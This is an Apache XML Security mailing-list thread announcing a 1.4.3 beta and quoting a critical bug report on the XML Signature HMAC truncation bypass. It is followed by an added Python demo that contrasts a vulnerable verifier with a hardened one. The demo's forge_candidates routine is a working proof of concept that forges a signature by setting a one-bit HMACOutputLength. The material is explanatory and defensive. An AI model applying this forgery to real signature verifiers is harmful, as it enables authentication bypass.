1.4.3beta1 binary and source distributions (and ASCII-encoded PGP signatures)
are now available at:
http://people.apache.org/~mullan/dist/
Signatures can be verified using the keys in
http://santuario.apache.org/dist/KEYS
Please let us know ASAP if you find any problems and thanks in advance for
testing! If no issues are found by Friday, this will become the release
candidate for 1.4.3.
Thanks,
Sean
Sean Mullan wrote:
Hi all,
I have just putback a fix for this vulnerability to the source code
repository. This patch will be included in the (Java) version 1.4.3
release. Because of the potential severity of this issue, we are
planning an expedited release process for 1.4.3. I plan to make
available a jar for testing later today and a more complete release
candidate binary tomorrow. If no issues are found then we will call for
a vote later this week and work towards making a final version available
early next week.
Thanks,
Sean
bugzi...@apache.org wrote:
https://issues.apache.org/bugzilla/show_bug.cgi?id=47526
Summary: XML signature HMAC truncation authentication bypass
Product: Security
Version: Java 1.4.2
Platform: All
OS/Version: All
Status: NEW
Severity: critical
Priority: P1
Component: Signature
AssignedTo: security-dev@xml.apache.org
ReportedBy: sean.mul...@sun.com
Apache XML Security (Java) is affected by the vulnerability published in
US-CERT VU #466161. See: http://www.kb.cert.org/vuls/id/466161 for more
information. This bug can allow an attacker to bypass authentication by
inserting/modifying a small HMAC truncation length parameter in the XML
Signature HMAC-based SignatureMethod algorithms.
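The bypass the bug report describes, shown as an added example that is not part of this thread and not Santuario code (Python is used here instead of the project's Java so the logic can be run stand-alone). The <SignedInfo> template, the shared key and the reference digest are constructed placeholders. The "vulnerable" verifier is a model of the problem as the report states it, a verifier that honours whatever <HMACOutputLength> the attacker-controlled document carries; the "hardened" verifier applies the floor later adopted in the W3C XML Signature erratum (at least 80 bits and at least half the hash output), which is assumed here and is not a quotation of the 1.4.3 patch itself.

```python
"""HMAC truncation bypass in XML Signature: vulnerable vs hardened verification."""
import hashlib
import hmac
import xml.etree.ElementTree as ET
from typing import List, Optional, Tuple

DSIG = "http://www.w3.org/2000/09/xmldsig#"
HMAC_SHA1_URI = "http://www.w3.org/2000/09/xmldsig#hmac-sha1"
SHA1_BITS = 160  # output length of the underlying hash, in bits


def build_signed_info(digest_b64: str, hmac_output_length: Optional[int] = None) -> bytes:
    """Constructed stand-in for a canonicalised <ds:SignedInfo>.

    The HMAC covers exactly these bytes. <HMACOutputLength> lives inside
    SignedInfo, so editing it changes the MACed bytes too; that does not
    bother the attacker, who only needs the first N bits of a fresh MAC to match.
    """
    hol = (f"<HMACOutputLength>{hmac_output_length}</HMACOutputLength>"
           if hmac_output_length is not None else "")
    xml = (
        f'<SignedInfo xmlns="{DSIG}">'
        '<CanonicalizationMethod Algorithm="http://www.w3.org/TR/2001/REC-xml-c14n-20010315"/>'
        f'<SignatureMethod Algorithm="{HMAC_SHA1_URI}">{hol}</SignatureMethod>'
        '<Reference URI="#body">'
        '<DigestMethod Algorithm="http://www.w3.org/2000/09/xmldsig#sha1"/>'
        f'<DigestValue>{digest_b64}</DigestValue>'
        '</Reference></SignedInfo>'
    )
    return xml.encode()


def hmac_output_length(signed_info: bytes) -> Optional[int]:
    """Return the truncation length the document asks for, or None if absent."""
    root = ET.fromstring(signed_info)
    node = root.find(f"{{{DSIG}}}SignatureMethod/{{{DSIG}}}HMACOutputLength")
    return None if node is None else int(node.text.strip())


def full_mac(key: bytes, signed_info: bytes) -> bytes:
    return hmac.new(key, signed_info, hashlib.sha1).digest()


def truncate_bits(mac: bytes, nbits: int) -> bytes:
    """Leading nbits of mac (RFC 2104 style truncation); partial last byte is masked."""
    nbytes, rem = divmod(nbits, 8)
    out = bytearray(mac[:nbytes + (1 if rem else 0)])
    if rem:
        out[-1] &= (0xFF << (8 - rem)) & 0xFF
    return bytes(out)


def verify_vulnerable(key: bytes, signed_info: bytes, signature_value: bytes) -> bool:
    """Model of the flaw: trusts any HMACOutputLength found in the document."""
    nbits = hmac_output_length(signed_info)
    if nbits is None:
        nbits = SHA1_BITS
    expected = truncate_bits(full_mac(key, signed_info), nbits)
    return hmac.compare_digest(expected, truncate_bits(signature_value, nbits))


def verify_hardened(key: bytes, signed_info: bytes, signature_value: bytes) -> bool:
    """Erratum floor (assumed here): reject lengths below max(80, hash/2) or above the hash."""
    nbits = hmac_output_length(signed_info)
    if nbits is None:
        nbits = SHA1_BITS
    if nbits < max(80, SHA1_BITS // 2) or nbits > SHA1_BITS:
        return False  # refuse outright; never clamp the value and carry on
    expected = truncate_bits(full_mac(key, signed_info), nbits)
    return hmac.compare_digest(expected, truncate_bits(signature_value, nbits))


def forge_candidates(digest_b64: str) -> Tuple[bytes, List[bytes]]:
    """Attacker without the key: set HMACOutputLength=1 and offer both 1-bit values.

    Exactly one candidate matches the leading bit of the verifier's own MAC,
    so two submissions guarantee acceptance by a verifier that honours the length.
    """
    tampered = build_signed_info(digest_b64, hmac_output_length=1)
    return tampered, [b"\x00", b"\x80"]


def demo() -> dict:
    key = b"shared secret known only to signer and verifier"  # constructed
    digest = "2jmj7l5rSw0yVb/vlWAYkK/YBwk="  # constructed placeholder DigestValue
    genuine = build_signed_info(digest)
    sig = full_mac(key, genuine)
    tampered, guesses = forge_candidates(digest)
    return {
        "genuine_ok_vulnerable": verify_vulnerable(key, genuine, sig),
        "genuine_ok_hardened": verify_hardened(key, genuine, sig),
        "forged_accepted_by_vulnerable": any(verify_vulnerable(key, tampered, g) for g in guesses),
        "forged_accepted_by_hardened": any(verify_hardened(key, tampered, g) for g in guesses),
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print(f"{name}: {result}")
```

The point to take away is that a truncation length read from the signed document is attacker input, and with a 1-bit (or 0-bit) length the "signature" carries no key material at all; the fix is a hard floor on the length, not a different comparison.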